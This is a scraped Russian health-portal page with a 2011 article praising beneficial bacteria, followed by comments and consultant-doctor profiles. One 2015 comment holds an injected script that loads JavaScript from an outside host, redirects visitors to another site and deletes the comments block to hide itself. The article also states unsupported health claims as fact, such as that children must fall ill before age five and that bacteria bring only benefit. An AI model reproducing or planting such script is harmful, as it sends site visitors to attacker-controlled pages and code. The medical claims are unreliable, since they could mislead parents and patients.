Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Любовь зла: полюбишь и ба...  >>  Любовь зла: полюбишь и бактерию
 
Обратная связь
 

Любовь зла: полюбишь и бактерию

Размер шрифта
17 ноября 2011 10:46
  • google_analytics: false
  • Нравится

Далеко не все бактерии опасны для здоровья. Многие из них вырабатывают витамины, обезвреживают токсины и поддерживают наш иммунитет в тонусе.

1

Три пользы бактерий:

 

  1. Кишечные бактерии – участники пищеварения.

Во рту у человека – миллион бактерий, в желудке их нет, а в одном грамме фекалий – их триллионы. Зачем человеку столько бактерий и за что они отвечают? 

  • Формируют иммунитет.
  • Производят витамины группы В и К.
  • Инактивируют агрессивные пищеварительные ферменты.
  • Обезвреживают токсины. Благодаря деятельности бактерии и процессу флотуленции («пуканью») мы избавляемся от опасных для здоровья веществ.

1

  1. Бактерии пробиотики помогают бактериям нашего кишечника. 

Процесс брожения в кисломолочных продуктах – это результат работы бактерий. Но есть бактерии, которые добавляют в йогурты уже после приготовления. Это – пробиотики Lactobacillus GG (L. GG), Lactobacillus casei (L. casei). На что они способны? 

  • Они способны пройти через агрессивную кислую среду желудка, где погибают все остальные бактерии. 
  • Попав в толстый кишечник, пробиотики стимулируют прохождение пищи по кишечнику.
  • Помогают нашим бактериям лучше переваривать пищу.
  1. Бактерии – лучшая зарядка для иммунитета.

1

Даже в патогенных бактериях есть польза для организма. Ребенок, проходя по родовым путям мамы, наглатывается бактерий. Так формируется первичный иммунитет: он учится распознавать чужеродные бактерии и в итоге становится крепче. Такая «гимнастика» делает защиту нашего организма сильнее. Дети, появившиеся на свет через кесарево сечение, хуже справляются с болезнями. Ребенок должен болеть до 5 лет, иначе его организм не научится справляться с чужеродными бактериями.

Так что бактерии надо любить, от них нашему организму одна только польза. 

Видеосюжеты по теме:

«Мама, я бактерию люблю!»

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.